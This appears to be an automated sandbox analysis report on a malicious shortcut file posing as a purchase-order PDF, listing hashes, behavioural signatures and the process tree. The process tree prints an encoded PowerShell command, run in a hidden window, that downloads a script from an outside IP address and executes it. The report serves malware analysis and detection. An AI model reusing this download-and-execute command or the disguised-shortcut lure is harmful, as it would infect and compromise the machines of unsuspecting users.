Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 16:00
Static task
static1
Behavioral task
behavioral1
Sample
SuryetexOrder_PO2025306.pdf.lnk
Resource
win7-20240903-en
5 signatures
150 seconds
General
-
Target
SuryetexOrder_PO2025306.pdf.lnk
-
Size
3KB
-
MD5
0bab2699985e9608e29bf856b17d8244
-
SHA1
2a5236c305599dfeb95477cc230f248597910782
-
SHA256
46c5104b98da465b208c05d2ae557194d166b4b149aa3d12a148657bef0eb96b
-
SHA512
3554e19d9ceea894b611e4ed491b1156310097b1ab3644433198913fdb077af321e0b344f76bb1d12687d35a1ad46bbc4c5661701e9153d2d00a25dd0e8487a0
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://87.121.79.103/download/6b4cc14c9c6445989353e73e97374f17.txt
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2072 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2072 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1328 wrote to memory of 2488 1328 cmd.exe 31 PID 1328 wrote to memory of 2488 1328 cmd.exe 31 PID 1328 wrote to memory of 2488 1328 cmd.exe 31 PID 2488 wrote to memory of 2072 2488 cmd.exe 32 PID 2488 wrote to memory of 2072 2488 cmd.exe 32 PID 2488 wrote to memory of 2072 2488 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\SuryetexOrder_PO2025306.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -EncodedCommand CgAKACQAQQAxAD0AWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADUAbABkAEMANQBYAFoAVwBKAEQAYgBHAGwAbABiAG4AUQA9ACcAKQApAAoACgAKACQAQQAyAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgACgAJABBADEAKQAKAAoACgAkAEEAMwA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAUgBHADkAMwBiAG0AeAB2AFkAVwBSAFQAZABIAEoAcABiAG0AYwA9ACcAKQApAAoACgAKACQAQQA1AD0AIgBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4ANwA5AC4AMQAwADMALwBkAG8AdwBuAGwAbwBhAGQALwA2AGIANABjAGMAMQA0AGMAOQBjADYANAA0ADUAOQA4ADkAMwA1ADMAZQA3ADMAZQA5ADcAMwA3ADQAZgAxADcALgB0AHgAdAAiAAoACgAKACQAQQA2AD0AJABBADIALgAkAEEAMwAoACQAQQA1ACkACgAKAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABBADYACgAKACAAIAAgACAA2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -EncodedCommand CgAKACQAQQAxAD0AWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADUAbABkAEMANQBYAFoAVwBKAEQAYgBHAGwAbABiAG4AUQA9ACcAKQApAAoACgAKACQAQQAyAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgACgAJABBADEAKQAKAAoACgAkAEEAMwA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAUgBHADkAMwBiAG0AeAB2AFkAVwBSAFQAZABIAEoAcABiAG0AYwA9ACcAKQApAAoACgAKACQAQQA1AD0AIgBoAHQAdABwADoALwAvADgANwAuADEAMgAxAC4ANwA5AC4AMQAwADMALwBkAG8AdwBuAGwAbwBhAGQALwA2AGIANABjAGMAMQA0AGMAOQBjADYANAA0ADUAOQA4ADkAMwA1ADMAZQA3ADMAZQA5ADcAMwA3ADQAZgAxADcALgB0AHgAdAAiAAoACgAKACQAQQA2AD0AJABBADIALgAkAEEAMwAoACQAQQA1ACkACgAKAAoASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABBADYACgAKACAAIAAgACAA3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-